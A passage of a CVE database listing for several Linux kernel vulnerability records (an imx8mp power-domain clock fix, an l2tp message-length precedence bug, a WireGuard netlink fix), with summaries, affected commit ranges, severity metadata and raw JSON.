      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f18681daaec9665a15c5e7e0f591aad5d0ac622b"
        },
        {
          "url": "https://git.kernel.org/stable/c/09e6bb53217bf388a0d2fd7fb21e74ab9dffc173"
        },
        {
          "url": "https://git.kernel.org/stable/c/c2b2430b48f3c9eaccd2c3d2ad75bb540d4952f4"
        },
        {
          "url": "https://git.kernel.org/stable/c/7cfee26d1950250b14c5cb0a37b142f3fcc6396a"
        },
        {
          "url": "https://git.kernel.org/stable/c/97e93367e82752e475a33839a80b33bdbef1209f"
        },
        {
          "url": "https://git.kernel.org/stable/c/51b7841f3fe84606ec0bd8da859d22e05e5419ec"
        },
        {
          "url": "https://git.kernel.org/stable/c/1341e4b32e1fb1b0acd002ccd56f07bd32f2abc6"
        },
        {
          "url": "https://git.kernel.org/stable/c/04c35ab3bdae7fefbd7c7a7355f29fa03a035221"
        }
      ],
      "title": "x86/mm/pat: fix VM_PAT handling in COW mappings",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35877",
    "datePublished": "2024-05-19T08:34:34.604Z",
    "dateReserved": "2024-05-17T13:50:33.110Z",
    "dateUpdated": "2025-05-04T09:07:25.990Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35942 (GCVE-0-2024-35942)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2025-05-04 09:08

Title

pmdomain: imx8mp-blk-ctrl: imx8mp_blk: Add fdcc clock to hdmimix domain

Summary

In the Linux kernel, the following vulnerability has been resolved: pmdomain: imx8mp-blk-ctrl: imx8mp_blk: Add fdcc clock to hdmimix domain According to i.MX8MP RM and HDMI ADD, the fdcc clock is part of hdmi rx verification IP that should not enable for HDMI TX. But actually if the clock is disabled before HDMI/LCDIF probe, LCDIF will not get pixel clock from HDMI PHY and print the error logs: [CRTC:39:crtc-2] vblank wait timed out WARNING: CPU: 2 PID: 9 at drivers/gpu/drm/drm_atomic_helper.c:1634 drm_atomic_helper_wait_for_vblanks.part.0+0x23c/0x260 Add fdcc clock to LCDIF and HDMI TX power domains to fix the issue.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9d3f959b426635c4d…
	https://git.kernel.org/stable/c/b13c0d871cd878ff5…
	https://git.kernel.org/stable/c/697624ee8ad557ab5…

Impacted products

Vendor

Product

Version

Linux

Affected: 556f5cf9568af772d494cff24ffaa7ea41e1ab40 , < 9d3f959b426635c4da50dfc7b1306afd84d23e7c (git)
Affected: 556f5cf9568af772d494cff24ffaa7ea41e1ab40 , < b13c0d871cd878ff53d25507ca535f59ed1f6a2a (git)
Affected: 556f5cf9568af772d494cff24ffaa7ea41e1ab40 , < 697624ee8ad557ab5417f985d2c804241a7ad30d (git)

Linux

Affected: 5.19
Unaffected: 0 , < 5.19 (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.082Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9d3f959b426635c4da50dfc7b1306afd84d23e7c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b13c0d871cd878ff53d25507ca535f59ed1f6a2a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/697624ee8ad557ab5417f985d2c804241a7ad30d"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35942",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:40:49.079486Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:14.873Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/pmdomain/imx/imx8mp-blk-ctrl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9d3f959b426635c4da50dfc7b1306afd84d23e7c",
              "status": "affected",
              "version": "556f5cf9568af772d494cff24ffaa7ea41e1ab40",
              "versionType": "git"
            },
            {
              "lessThan": "b13c0d871cd878ff53d25507ca535f59ed1f6a2a",
              "status": "affected",
              "version": "556f5cf9568af772d494cff24ffaa7ea41e1ab40",
              "versionType": "git"
            },
            {
              "lessThan": "697624ee8ad557ab5417f985d2c804241a7ad30d",
              "status": "affected",
              "version": "556f5cf9568af772d494cff24ffaa7ea41e1ab40",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/pmdomain/imx/imx8mp-blk-ctrl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.19"
            },
            {
              "lessThan": "5.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\npmdomain: imx8mp-blk-ctrl: imx8mp_blk: Add fdcc clock to hdmimix domain\n\nAccording to i.MX8MP RM and HDMI ADD, the fdcc clock is part of\nhdmi rx verification IP that should not enable for HDMI TX.\nBut actually if the clock is disabled before HDMI/LCDIF probe,\nLCDIF will not get pixel clock from HDMI PHY and print the error\nlogs:\n\n[CRTC:39:crtc-2] vblank wait timed out\nWARNING: CPU: 2 PID: 9 at drivers/gpu/drm/drm_atomic_helper.c:1634 drm_atomic_helper_wait_for_vblanks.part.0+0x23c/0x260\n\nAdd fdcc clock to LCDIF and HDMI TX power domains to fix the issue."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:08:54.018Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9d3f959b426635c4da50dfc7b1306afd84d23e7c"
        },
        {
          "url": "https://git.kernel.org/stable/c/b13c0d871cd878ff53d25507ca535f59ed1f6a2a"
        },
        {
          "url": "https://git.kernel.org/stable/c/697624ee8ad557ab5417f985d2c804241a7ad30d"
        }
      ],
      "title": "pmdomain: imx8mp-blk-ctrl: imx8mp_blk: Add fdcc clock to hdmimix domain",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35942",
    "datePublished": "2024-05-19T10:10:46.876Z",
    "dateReserved": "2024-05-17T13:50:33.132Z",
    "dateUpdated": "2025-05-04T09:08:54.018Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26752 (GCVE-0-2024-26752)

Vulnerability from cvelistv5 – Published: 2024-04-03 17:00 – Updated: 2025-05-04 12:54

Title

l2tp: pass correct message length to ip6_append_data

Summary

In the Linux kernel, the following vulnerability has been resolved: l2tp: pass correct message length to ip6_append_data l2tp_ip6_sendmsg needs to avoid accounting for the transport header twice when splicing more data into an already partially-occupied skbuff. To manage this, we check whether the skbuff contains data using skb_queue_empty when deciding how much data to append using ip6_append_data. However, the code which performed the calculation was incorrect: ulen = len + skb_queue_empty(&sk->sk_write_queue) ? transhdrlen : 0; ...due to C operator precedence, this ends up setting ulen to transhdrlen for messages with a non-zero length, which results in corrupted packets on the wire. Add parentheses to correct the calculation in line with the original intent.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/4c3ce64bc9d36ca91…
	https://git.kernel.org/stable/c/c1d3a84a67db910ce…
	https://git.kernel.org/stable/c/dcb4d14268595065c…
	https://git.kernel.org/stable/c/0da15a70395182ee8…
	https://git.kernel.org/stable/c/13cd1daeea848614e…
	https://git.kernel.org/stable/c/804bd8650a3a2bf34…
	https://git.kernel.org/stable/c/83340c66b498e4935…
	https://git.kernel.org/stable/c/359e54a93ab43d32e…

Impacted products

Vendor

Product

Version

Linux

Affected: 559d697c5d072593d22b3e0bd8b8081108aeaf59 , < 4c3ce64bc9d36ca9164dd6c77ff144c121011aae (git)
Affected: 1fc793d68d50dee4782ef2e808913d5dd880bcc6 , < c1d3a84a67db910ce28a871273c992c3d7f9efb5 (git)
Affected: 96b2e1090397217839fcd6c9b6d8f5d439e705ed , < dcb4d14268595065c85dc5528056713928e17243 (git)
Affected: cd1189956393bf850b2e275e37411855d3bd86bb , < 0da15a70395182ee8cb75716baf00dddc0bea38d (git)
Affected: f6a7182179c0ed788e3755ee2ed18c888ddcc33f , < 13cd1daeea848614e585b2c6ecc11ca9c8ab2500 (git)
Affected: 9d4c75800f61e5d75c1659ba201b6c0c7ead3070 , < 804bd8650a3a2bf3432375f8c97d5049d845ce56 (git)
Affected: 9d4c75800f61e5d75c1659ba201b6c0c7ead3070 , < 83340c66b498e49353530e41542500fc8a4782d6 (git)
Affected: 9d4c75800f61e5d75c1659ba201b6c0c7ead3070 , < 359e54a93ab43d32ee1bff3c2f9f10cb9f6b6e79 (git)
Affected: 7626b9fed53092aa2147978070e610ecb61af844 (git)
Affected: fe80658c08e3001c80c5533cd41abfbb0e0e28fd (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 4.19.308 , ≤ 4.19.* (semver)
Unaffected: 5.4.270 , ≤ 5.4.* (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26752",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-03T18:05:57.024676Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:48:58.719Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.330Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4c3ce64bc9d36ca9164dd6c77ff144c121011aae"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c1d3a84a67db910ce28a871273c992c3d7f9efb5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dcb4d14268595065c85dc5528056713928e17243"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0da15a70395182ee8cb75716baf00dddc0bea38d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/13cd1daeea848614e585b2c6ecc11ca9c8ab2500"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/804bd8650a3a2bf3432375f8c97d5049d845ce56"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/83340c66b498e49353530e41542500fc8a4782d6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/359e54a93ab43d32ee1bff3c2f9f10cb9f6b6e79"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/l2tp/l2tp_ip6.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4c3ce64bc9d36ca9164dd6c77ff144c121011aae",
              "status": "affected",
              "version": "559d697c5d072593d22b3e0bd8b8081108aeaf59",
              "versionType": "git"
            },
            {
              "lessThan": "c1d3a84a67db910ce28a871273c992c3d7f9efb5",
              "status": "affected",
              "version": "1fc793d68d50dee4782ef2e808913d5dd880bcc6",
              "versionType": "git"
            },
            {
              "lessThan": "dcb4d14268595065c85dc5528056713928e17243",
              "status": "affected",
              "version": "96b2e1090397217839fcd6c9b6d8f5d439e705ed",
              "versionType": "git"
            },
            {
              "lessThan": "0da15a70395182ee8cb75716baf00dddc0bea38d",
              "status": "affected",
              "version": "cd1189956393bf850b2e275e37411855d3bd86bb",
              "versionType": "git"
            },
            {
              "lessThan": "13cd1daeea848614e585b2c6ecc11ca9c8ab2500",
              "status": "affected",
              "version": "f6a7182179c0ed788e3755ee2ed18c888ddcc33f",
              "versionType": "git"
            },
            {
              "lessThan": "804bd8650a3a2bf3432375f8c97d5049d845ce56",
              "status": "affected",
              "version": "9d4c75800f61e5d75c1659ba201b6c0c7ead3070",
              "versionType": "git"
            },
            {
              "lessThan": "83340c66b498e49353530e41542500fc8a4782d6",
              "status": "affected",
              "version": "9d4c75800f61e5d75c1659ba201b6c0c7ead3070",
              "versionType": "git"
            },
            {
              "lessThan": "359e54a93ab43d32ee1bff3c2f9f10cb9f6b6e79",
              "status": "affected",
              "version": "9d4c75800f61e5d75c1659ba201b6c0c7ead3070",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "7626b9fed53092aa2147978070e610ecb61af844",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "fe80658c08e3001c80c5533cd41abfbb0e0e28fd",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/l2tp/l2tp_ip6.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.308",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.270",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.308",
                  "versionStartIncluding": "4.19.296",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.270",
                  "versionStartIncluding": "5.4.258",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "5.10.198",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "5.15.135",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "6.1.57",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.327",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.5.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nl2tp: pass correct message length to ip6_append_data\n\nl2tp_ip6_sendmsg needs to avoid accounting for the transport header\ntwice when splicing more data into an already partially-occupied skbuff.\n\nTo manage this, we check whether the skbuff contains data using\nskb_queue_empty when deciding how much data to append using\nip6_append_data.\n\nHowever, the code which performed the calculation was incorrect:\n\n     ulen = len + skb_queue_empty(\u0026sk-\u003esk_write_queue) ? transhdrlen : 0;\n\n...due to C operator precedence, this ends up setting ulen to\ntranshdrlen for messages with a non-zero length, which results in\ncorrupted packets on the wire.\n\nAdd parentheses to correct the calculation in line with the original\nintent."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:54:40.861Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/4c3ce64bc9d36ca9164dd6c77ff144c121011aae"
        },
        {
          "url": "https://git.kernel.org/stable/c/c1d3a84a67db910ce28a871273c992c3d7f9efb5"
        },
        {
          "url": "https://git.kernel.org/stable/c/dcb4d14268595065c85dc5528056713928e17243"
        },
        {
          "url": "https://git.kernel.org/stable/c/0da15a70395182ee8cb75716baf00dddc0bea38d"
        },
        {
          "url": "https://git.kernel.org/stable/c/13cd1daeea848614e585b2c6ecc11ca9c8ab2500"
        },
        {
          "url": "https://git.kernel.org/stable/c/804bd8650a3a2bf3432375f8c97d5049d845ce56"
        },
        {
          "url": "https://git.kernel.org/stable/c/83340c66b498e49353530e41542500fc8a4782d6"
        },
        {
          "url": "https://git.kernel.org/stable/c/359e54a93ab43d32ee1bff3c2f9f10cb9f6b6e79"
        }
      ],
      "title": "l2tp: pass correct message length to ip6_append_data",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26752",
    "datePublished": "2024-04-03T17:00:37.340Z",
    "dateReserved": "2024-02-19T14:20:24.169Z",
    "dateUpdated": "2025-05-04T12:54:40.861Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26950 (GCVE-0-2024-26950)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:18 – Updated: 2025-05-04 09:00

Title

wireguard: netlink: access device through ctx instead of peer

Summary

In the Linux kernel, the following vulnerability has been resolved: wireguard: netlink: access device through ctx instead of peer The previous commit fixed a bug that led to a NULL peer->device being dereferenced. It's actually easier and faster performance-wise to instead get the device from ctx->wg. This semantically makes more sense too, since ctx->wg->peer_allowedips.seq is compared with ctx->allowedips_seq, basing them both in ctx. This also acts as a defence in depth provision against freed peers.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/493aa6bdcffd90a4f…
	https://git.kernel.org/stable/c/4be453271a882c8eb…
	https://git.kernel.org/stable/c/09c3fa70f65175861…
	https://git.kernel.org/stable/c/c991567e6c6380793…
	https://git.kernel.org/stable/c/93bcc1752c69bb309…
	https://git.kernel.org/stable/c/d44bd323d8bb8031e…
	https://git.kernel.org/stable/c/71cbd32e3db82ea4a…

Impacted products

Vendor

Product

Version

Linux

Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 493aa6bdcffd90a4f82aa614fe4f4db0641b4068 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 4be453271a882c8ebc28df3dbf9e4d95e6ac42f5 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 09c3fa70f65175861ca948cb2f0f791e666c90e5 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < c991567e6c638079304cc15dff28748e4a3c4a37 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 93bcc1752c69bb309f4d8cfaf960ef1faeb34996 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < d44bd323d8bb8031eef4bdc44547925998a11e47 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 71cbd32e3db82ea4a74e3ef9aeeaa6971969c86f (git)

Linux

Affected: 5.6
Unaffected: 0 , < 5.6 (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26950",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-06T18:55:56.220490Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-07T15:00:58.528Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.839Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/493aa6bdcffd90a4f82aa614fe4f4db0641b4068"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4be453271a882c8ebc28df3dbf9e4d95e6ac42f5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/09c3fa70f65175861ca948cb2f0f791e666c90e5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c991567e6c638079304cc15dff28748e4a3c4a37"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/93bcc1752c69bb309f4d8cfaf960ef1faeb34996"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d44bd323d8bb8031eef4bdc44547925998a11e47"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/71cbd32e3db82ea4a74e3ef9aeeaa6971969c86f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireguard/netlink.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "493aa6bdcffd90a4f82aa614fe4f4db0641b4068",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "4be453271a882c8ebc28df3dbf9e4d95e6ac42f5",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "09c3fa70f65175861ca948cb2f0f791e666c90e5",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "c991567e6c638079304cc15dff28748e4a3c4a37",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "93bcc1752c69bb309f4d8cfaf960ef1faeb34996",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "d44bd323d8bb8031eef4bdc44547925998a11e47",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "71cbd32e3db82ea4a74e3ef9aeeaa6971969c86f",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireguard/netlink.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.6"
            },
            {
              "lessThan": "5.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
